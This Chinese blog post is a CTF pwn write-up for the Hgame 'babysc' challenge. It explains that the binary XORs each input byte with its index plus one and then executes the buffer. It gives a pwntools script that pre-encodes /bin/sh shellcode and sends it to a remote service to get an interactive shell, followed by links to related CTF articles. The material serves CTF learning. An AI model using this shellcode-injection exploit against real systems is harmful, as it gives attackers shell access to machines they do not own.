CTF-PWN-babysc(Hgame)

最新推荐文章于 2025-02-20 21:39:14 发布
最新推荐文章于 2025-02-20 21:39:14 发布
阅读量835 收藏 1
点赞数
分类专栏: CTF-PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/getsum/article/details/86763139
版权

直接运行该程序,发现没有任何提示信息,随便输入一串字符之后,程序错误退出。

扔进ida查看:

程序用read函数读入buf,然后判断[rbp+var_4]和0x4f的大小关系。这里可以知道[rbp+var_4]应为循环变量,buf长度为80

然后对于buf[i] ,异或buf[i]^(i+1),最后将buf蕴含的指令赋值给rdx并执行。

我们可以考虑直接构造system(/bin/sh),执行即可

from pwn import *
context(arch="amd64",os="linux")
payload2=""
payload=asm(shellcraft.sh())
payload+='\x00'*(80-len(payload))
for i in range(len(payload)):
    tmp=chr(ord(payload[i])^(i+1))
    payload2+=tmp
p=remote("××××××××",10000)
p.sendline(payload2)
p.interactive()

 

ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。这些挑战旨在测试各种安全技能,包括密码学、逆向工程、漏洞利用和网络分析等。 CTF题库通常由多个类别的挑战组成,例如Web安全、二...
0ctf2017-babypwn
CharlesGodX的博客
09-10 886
前言 本片文章从0ctf2017-babyheap这一道pwn题目入手,讲解pwn堆中的一些利用手法 题目链接 分析程序 首先检查程序保护,所有的保护措施都是开启的,这意味着我们想要改写程序流程考虑从malloc_hook和free_hook入手 [*] '/home/thunder/Desktop/codes/ctf/pwn/heap/0ctf_babyheap/0ctfbabyheap' ...
【Web】小白也能做的RWCTF体验赛baby题部分wp
uuzeray的博客
01-28 1078
遇到不会的题,怎么办!有的师傅告诉你完了,废了,寄了!只有Z3告诉你,稳辣!稳辣!都稳辣!这种CVE复现的题型,不可能要求选手从0到1进行0day挖掘,其实考察的还是nday利用能力,我们需要快速进行信息检索并大致理解exp过程,赛后消化这些CVE,至少做到简单积累。
HGAME-CTF-2025-WEB
最新发布
Rsecret2的博客
02-20 899
2025-HGAME-CTF-WEB
[BUUCTF]PWN——[V&N2020 公开赛]babybabypwn
mcmuyanga的博客
11-28 858
[V&N2020 公开赛]babybabypwn 附件 步骤: 例行检查,64位程序,保护全开 本地试运行一下,看看程序的大概情况 64位ida载入,看一下main函数 sub_1202()函数,沙盒的限制条件 用seccomp-tools看一下 其他禁用的指令是干什么的我不是很清楚,但是禁用了execve(系统调用),也就没办法获取shell权限了,只能够想办法通过open–>read–>write的方式来获取flag的值了 sub_1347()函数
CTF-PWN-ROPbaby(实验吧)
SuperGate的博客
02-07 1907
学rop的时候刷到的题,感觉很有启发于是就写下来。 本文很大程度上借鉴了如下文章: http://wzt.ac.cn/2018/04/02/ROP/ 进入正题。我们发现题目中给了我们libc的文件,在ropbaby程序中也可以直接查找libc基地址,因此我们就可以不用在主程序中寻找了。 首先我们查看ropbaby文件的保护方式 由于开了NX,shellcode的方式就不好弄了,因此我...
N1CTF2019——babypwn WP
qq_41252520的博客
10-13 646
保护 我的测试环境为ubuntu16.04.1 分析 添加操作中限制只能添加10个结构体: 结构体为: struct Staff{ char Name[0x10]; char *Description; int Description_Size; }; 漏洞存在删除操作中: 总的二进制程序逆向分析到这,下面来考虑怎么利用。 利用 这道题和warmup那道题有点相似,但...
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
基于C语言的CTF-PWN方向入门课程《为缺少指导的同学而生》设计源码
02-07
本项目源码为CTF(Capture The Flag,夺旗赛)中的PWN(漏洞利用)方向提供了一个系统的入门课程。CTF是一种信息安全竞赛,参赛者需要解决各种信息安全问题,而PWN是其中的一个重要领域,主要涉及发现和利用软件中的...
CTF-Tools-v1.3.5
01-24
CTF-Tools-v1.3.5
0ctf-2017-pwn-char
02-05
2017年0ctfpwn题,题目质量还是非常高的,要求做题人需要扎实的shellcode编写能力和ROP链构造能力,下面给出wp链接:https://blog.youkuaiyun.com/A951860555/article/details/113666423
rOpbaby-CTFPWN ROP练习题
08-21
DefConCTF 2015 Quals CTFPWN ROP练习题 可用于练习基础的ROP
SuperModel(3D图像查看器) v25.0.zip
07-10
SuperModel(3D图像查看器) v25.0更新: 1. 大幅度更新了界面 2. 解决了其它一些琐碎的BUG SuperModel是一款简单易用,晶莹剔透的3D模型和图像查看器。 SuperModel目前支持的格式有: .3DS、.OBJ、.MD2、.MD3、.MS3D、.X; .JPG、.PNG、.GIF、.BMP、.TGA、.DDS、.DIB、.HDR、.PFM、.PPM、.PCX、.ICO、.CUR、WBMP、TIF。
CTF-RE-わかります(hgame2018)
SuperGate的博客
01-27 2367
Hgame week1里面应该说是最难的一个题。 主函数点进去之后会发现一个函数来判断输入的是不是flag。点进去内容如下: 发现ptr数组存的是输入字符串转化为ascii码之后每个字符的前4位,v7则是后4位,这里的位是二进制位。 然后分别将两个dword_6021xx数组找出来,点进生成v8v9的函数就可以把flag对应的每个字符的高低位算出来了。 其中v9生成函数比较容易求出v9,v...
强网杯2021 pwn 赛题解析——babypwn
CoLin的pwn小屋
07-26 1006
强网杯2021 pwn 赛题回顾——babypwn
2019国赛2.baby_pwn 利用ret2_dl_resolve
Jc
07-06 750
分析: 1.查看文件的属性 checksec 可行性文件名 2.阅读伪源码查看溢出大小 { char buf; // [sp+0h] [bp-28h]@1 return read(0, &buf, 0x100u); } 注:这里可以结合gdb-peda的 pattern命令 查看溢出大小 3.只有一个read(我们没有libc文件),strings里面没有可以利用的敏感字符...
虎符CTF-2022 babygame 题解
CoLin的pwn小屋
04-01 1174
虎符CTF最简单的一道pwn题。
CTF-RE-shinyshot!(Hgame week2)
SuperGate的博客
02-17 717
hd的师傅们出的题还是十分有意思的……这道题花了很多天时间才有了头绪,现在才搞出来。 我们把程序扔进ida反复调试后发现了一个奇怪的函数:sub_401460(v10),这个函数将我们输入的数字进行操作。我们点进去看: 很懵逼,没有见过的底层函数,和奇奇怪怪的变量名称。由于内部对toplevelexceptionfilter变量进行的操作比较多,我们首先关注这个变量。 在每次调试的时候都...
CTF-WEB篇 攻防世界题目实战解析baby_web
2301_76565920的博客
04-21 1024
题目:baby_web 难度:1。index.php,抓包,查看header
CTFHub-技能树-pwn
01-01
### CTFHub Pwn 技能树教程与资源 Pwn 类型的挑战通常涉及利用程序中的漏洞来获取控制权。这类题目可以测试参赛者对二进制文件的理解以及逆向工程的能力。 在 CTF竞赛中,`pwntools` 是一个非常流行的 Python 库,...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值